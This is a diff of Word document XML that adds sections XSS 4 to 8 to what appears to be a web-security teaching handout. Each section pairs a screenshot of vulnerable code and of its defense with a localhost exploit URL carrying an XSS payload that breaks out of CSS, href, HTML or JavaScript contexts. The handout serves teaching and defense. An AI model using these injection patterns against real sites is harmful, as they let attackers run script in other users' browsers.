+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>CSS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="12"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="390F2736" wp14:editId="66D4DD12">
+            <wp:extent cx="3638550" cy="923925"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="47" name="Image 47"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3638550" cy="923925"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId40" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=javascript:alert(1)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Or go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId41" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>red;</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">}&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1440"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6915F6AB" wp14:editId="357E3AFF">
+            <wp:extent cx="4991100" cy="1019175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="48" name="Image 48"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4991100" cy="1019175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>href</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="13"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A972AC" wp14:editId="04448FA3">
+            <wp:extent cx="3380952" cy="876190"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="55" name="Image 55"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3380952" cy="876190"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId44" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price="</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>&gt;&lt;/a&gt;&lt;script&gt;alert(1)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4749047E" wp14:editId="0AC14327">
+            <wp:extent cx="3533775" cy="657225"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="56" name="Image 56"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId45"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3533775" cy="657225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>allowed HTML but disallowed JS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="14"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C1291E" wp14:editId="234C662A">
+            <wp:extent cx="5219700" cy="666750"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="59" name="Image 59"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId46"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5219700" cy="666750"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId47" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=&lt;script&gt;alert(1)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6EA5E6" wp14:editId="624151F7">
+            <wp:extent cx="4629150" cy="1466850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="60" name="Image 60"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4629150" cy="1466850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>JS URLs</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="15"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D8D4CD" wp14:editId="6B08F38C">
+            <wp:extent cx="5731510" cy="266700"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="63" name="Image 63"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="266700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId50" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>1);alert(</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>"</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>Code</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>Malveillant</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>) ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5A08F2" wp14:editId="62A7CF19">
+            <wp:extent cx="5162550" cy="914400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="66" name="Image 66"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId51"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5162550" cy="914400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in href) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="16"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136A4807" wp14:editId="6F59FFD8">
+            <wp:extent cx="5731510" cy="266700"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="64" name="Image 64"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="266700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId52" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=1);alert("Code</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>Malveillant</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>) ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB8F05C" wp14:editId="53E9F308">
+            <wp:extent cx="4629150" cy="1466850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="65" name="Image 65"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId48"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4629150" cy="1466850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:firstLine="0"/>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId53"/>
       <w:footnotePr>
         <w:pos w:val="beneathText"/>
       </w:footnotePr>
@@ -1521,6 +4682,335 @@
       </w:r>
       <w:r>
         <w:t>ttps://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="2">
